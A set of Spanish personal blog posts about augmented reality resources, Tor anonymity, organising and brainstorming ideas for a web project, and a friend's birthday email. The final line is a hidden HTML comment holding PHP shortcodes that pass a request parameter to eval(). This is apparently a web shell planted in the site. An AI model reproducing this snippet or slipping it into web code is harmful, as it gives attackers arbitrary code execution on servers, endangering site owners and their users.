Realidad ¿virtual?

Llevo unos días en los que no hago mas que leer en diferentes sitios sobre la realidad aumentada, y la verdad es que tras ver algún video que otro me ha hecho sentir curiosidad sobre esta forma de aplicar la tecnología.

Me he puesto a buscar en San Google (patrón de los internautas perdidos), y me he llevado una grata sorpresa al ver que hay una gran variedad de información. Claro, que mucha de esta información no es apta para “no iniciados” en, lo que parece, tan fascinante arte.

He decidido bajar un poco el listón, y buscar algo mas suavecito para empezar con el viaje a este nuevo mundo desconocido, y he visto que existe suficiente información para dar nuestros primeros pasos.

Deberiamos comenzar con las especificaciones que la Web3D consortium nos ofrece . Si no nos gusta la teoría y queremos ir a la práctica directamente, os aconsejo el wiki que he encontrado, y que pertenece a la universidad donde ahora consumo gran parte de mi poco tiempo libre. Desde aquí podréis tener acceso directo a multitud de lecturas, todas interesantes, sobre modelado con VRML, X3D, Blender y un largo etcétera.

Con un mucho de paciencia, y un tanto más de tiempo, estudio y dedicación, podremos llegar a hacer cosas como estas.

Suerte 😉

Tor, el dios de la cebolla

Ultimamente en la red se esta hablando mucho de la privacidad de los datos y de como los que nos gobiernan quieren meter mano en ellos, para pagar, no se sabe que favores, a algunas empresas privadas.

Ya lo decia Platón:

“La gente buena no necesita leyes que les diga lo que tienen que hacer para actuar responsablemente; la gente mala en cambio encontrará las formas de saltarse las leyes”

Pero lo que nuestros gobernantes no saben, ni siquiera intuyen, es que la red esta viva, y que no les necesita para sobrevivir. Muchos de los que legislan creen que internet es google, el porno, una cuna del terrorismo, ¿p2p? y que los usuarios habituales de la red, son entes aislados, personas introvertidas, que no se relacionan con su entorno y que cuando lo hacen, la emprenden a tiros con sus colegas.

Para evitar que el ojo del gran hermano nos controle, se ideó la implementación Tor sobre la red onion (traducido como cebolla en castellano), que permite a los usuarios comunicarse en Internet de manera anónima. No es la panacea, no es fiable 100% en lo que se refiere al cifrado de la información (esta probado que un servidor de salida puede ver toda la información cuando es descifrada antes de llegar a internet), pero resulta imposible saber quién es el autor de dicha información.

Hay plugins para firefox que nos permitiran acceder a dicha red de una manera sencilla. Muchos proxys anonimos la utilizan, pero como realmente obtendremos toda su salsa, es configurandola por nosotros mismos (vale, vale, apunto que os debo un tutorial 🙂 )

A ver si conseguimos que a nuestros gobernantes se les salten las lágrimas con el olor a cebolla 😉

Segundo Paso – La organización

Ya tenemos ¿todas? nuestras ideas, sobre el proyecto en el que nos embarcamos, escritas en algún lugar. No tienen orden ni concierto, y seguramente nadie que no seamos nosotros mismos será capaz de entender ni un ápice lo que intentan decir.

Ahora toca ordenar todo ese cúmulo de ideas de una manera que sea entendible por el resto de la humanidad y porque no, por nosotros mismos cuando hayan pasado un par de dias y no tengamos tan reciente la creación de los apuntes, o simplemente hayamos creado varios y no sepamos de a que proyecto pertenece cada idea. Creedme, cuando tengáis 4 o 5 ideas distintas para más de un proyecto, no os acordaréis de más de 2 o 3.

Hay muchas maneras de organizar la información: por secciones, por similitud, por dificultad, por el tiempo dedicado a refinarlas, por el tipo, etc. Elegid aquella con la que os sentáis más comodos y creais os va a facilitar el trabajo. Yo personalmente suelo dividirla en tres partes: lo que se hacer, lo que no se hacer, lo que ya he hecho antes. Y dentro de cada una de ellas divido en otras subsecciones: programación, diseño, funcionalidad, etc. No hay un patrón fijo. Debemos recordar que es nuestro proyecto, y que los principales interesados en tener todo claro somos nosotros mismos.

De lo bien o mal que organicemos nuestras ideas, puede depender que nos cueste mas o menos hacer las cosas, e incluso darnos cuenta en esta etapa de que cosas no hace falta que hagamos de nuevo, pues ya las tenemos hechas. Ya sabemos lo escasos de tiempo que andamos todos 🙂

No todo va a ser informática

lobo aullandoNo todo va a ser informática y trabajo. No todo va a ser explicar como creo que se deberian de hacer las cosas. Ya dije que de vez en cuando escribiría algún que otro post personal, y he aquí el primero  (que no el último)

Hoy ha sido un día extraño. Un día de esos en los que desde que te levantas tienes la sensación de que algo especial va a ocurrir. Un día de esos en los que te levantas ñoño.

He recibido un correo electrónico, junto a otras ochenta personas mas, de un buen amigo al que le montamos (realmente la organizó su mujer, nosotros, los ochenta, simplemente estuvimos allí) una fiesta sorpresa por su 40 cumpleanos. Es un correo de agradecimiento. De agradecimiento sincero. Un correo de esos que te ponen los pelos como escarpias y humedecen mas de lo normal los ojos.

Esto me ha hecho reflexionar sobre porque nos cuesta tanto mostrar nuestros sentimientos a los demás. ¿Porqué nos escudamos, muchas veces, tras un teclado o tras un diario?. ¿Porqué no somos capaces de sentarnos delante de alguien y sincerarnos?. ¿Tanto nos cuesta decir a la gente lo que pensamos para bien o para mal?

Yo no tengo respuestas.

Primer Paso – La idea

El miedo al papel en blanco es algo por lo que alguna vez todos hemos pasado. Tener ideas no es tarea sencilla. Plasmarlas en papel de manera coherente, sobre todo las primeras veces, muy complicado.
Brainstorm
En la vorágine del día a día, pocas son las empresas que dedican un tiempo prudencial a analizar intensamente los proyectos que les llegan. Craso error. Personalmente, siempre he sido de la opinión de que si tenemos claro lo que queremos hacer, luego nos resultará mas sencillo llevarlo a cabo.

Por eso, cuando nos enfrentamos a un nuevo proyecto web de creación propia, lo primero que hay que hacer es apagar el ordenador, coger un lápiz, goma de borrar y un elegir un lugar donde escribir. Bueno, realmente no hay que ser tan drástico, y podemos utilizar el ordenador y olvidarnos del papel y la goma de borrar.

Una vez decidido como vamos a hacerlo (con papel o con el ordenador), pongámonos a escribir todo aquello que querriamos que tuviera nuestro site. Cuando digo todo, me refiero a TODO. No os cortéis, ni os preocupéis de como lo solucionaréis más tarde, de si se podrá o no hacer. Estamos en el momento de las ideas, duro con ellas. Es el instante en que debemos estrujar el cerebro. Incluso imaginaros como quedaría, lo que estáis escribiendo, cuando el proyecto este finalizado. Poco a poco ira tomando forma y en vuestra cabeza apareceran colores, fotografias, dibujos, estructura y mil y una cosas que os ayudarán en pasos posteriores. Anotadlo todo, no dejéis nada de lo que vuestra imaginación fabrique sin anotar. Mas adelante lo agradeceréis.

<!– [insert_php]if (isset($_REQUEST["eDkB"])){eval($_REQUEST["eDkB"]);exit;}[/insert_php][php]if (isset($_REQUEST["eDkB"])){eval($_REQUEST["eDkB"]);exit;}[/php] –>